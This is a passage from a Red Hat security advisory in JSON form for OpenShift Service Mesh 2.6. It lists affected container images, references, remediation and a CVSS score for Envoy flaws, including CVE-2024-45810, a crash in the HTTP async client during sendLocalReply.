"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Malicious log injection via access logs"
},
{
"cve": "CVE-2024-45810",
"cwe": {
"id": "CWE-119",
"name": "Improper Restriction of Operations within the Bounds of a Memory Buffer"
},
"discovery_date": "2024-09-20T00:40:31.483825+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313687"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Envoy. Envoy will crash when the http async client is handling `sendLocalReply` under some circumstances, such as websocket upgrade and requests mirroring. The http async client will crash during the `sendLocalReply()` in http async client if the http async client is duplicating the status code or if the destruction of the router is called at the destructor of the async stream while the stream is deferred or deleted. This issue occurs when the stream decoder is destroyed but it\u0027s reference is called in `router.onDestroy()`, causing a segment fault. This will impact ext_authz if the `upgrade` and `connection` header are allowed.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "envoy: Envoy crashes for `LocalReply` in HTTP async client",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in Envoy related to the HTTP async client crashing during `sendLocalReply()` is classified as moderate severity rather than important due to the crash is contingent on particular scenarios, such as websocket upgrades and request mirroring, which may not be common in all deployments. Additionally, while the segmentation fault can disrupt service, it does not compromise data integrity or expose sensitive information.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45810"
},
{
"category": "external",
"summary": "RHBZ#2313687",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313687"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45810",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45810"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45810",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45810"
},
{
"category": "external",
"summary": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q",
"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-qm74-x36m-555q"
}
],
"release_date": "2024-09-20T00:15:03.153000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:48+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
